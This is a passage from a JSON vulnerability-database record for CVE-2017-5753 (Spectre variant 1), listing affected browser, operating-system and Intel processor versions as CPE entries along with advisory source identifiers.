        "version": "12.0.713.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.643.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1057.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.228"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "53.0.2785.144"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.5"
      },
      {
        "model": "bactec",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "9120/92400"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.504.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.767.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1292.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1058.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "62.0.3202.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.129"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.21"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.218"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.68"
      },
      {
        "model": "windows version for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1016070"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.359.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.205"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.83"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.78"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.1.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.565.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.536.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.567.0"
      },
      {
        "model": "ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "11.2.2"
      },
      {
        "model": "vm server for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x863.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.37586"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.238"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.98"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.656.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1011"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1033.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.788.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.691.0"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#180049"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00304"
      },
      {
        "db": "BID",
        "id": "102371"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5753"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2308:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2316:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2338:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2350:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2358:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2508:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2516:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2518:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2530:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2538:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2550:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2558:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2718:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2730:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2738:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2750:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2758:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3308:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3338:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3508:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3538:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3558:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3708:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3750:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3758:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3808:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3830:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3850:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3858:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3950:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3955:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3958:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3805:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3815:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3825:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3826:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3827:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3845:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3130:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3200rk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3205rk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3230rk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3235rk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3265rk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3295rk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3405:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3445:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_x5-e3930:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_x5-e3940:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_x7-e3950:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2420:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2460:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2480:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2520:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2560:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2580:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2760:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3460:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3480:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3530:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3560:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3570:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3580:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3590:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3735d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3735e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3735f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3735g:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3736f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3736g:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3740:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3740d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3745:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3745d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3770:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3770d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3775:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3775d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3785:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3795:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j1750:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j1800:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j1850:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j1900:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j3060:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j3160:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j3355:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j3455:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j4005:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j4105:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2805:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2806:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2807:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2808:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2810:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2815:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2820:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2830:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2840:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2910:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2920:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2930:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2940:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3000:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3010:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3050:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3060:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3150:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3160:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3350:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3450:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n4000:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n4100:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:330e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:330m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:330um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:350m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:370m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:380m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:380um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:390m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:530:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:540:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:550:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:560:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2100:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2100t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2102:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2105:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2115c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2120:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2120t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2125:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2130:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2310e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2310m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2312m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2328m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2330e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2330m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2340ue:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2348m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2350m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2357m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2365m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2367m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2370m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2375m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2377m:*:*:*:*:*:*:*",
                "cpe_name": [],
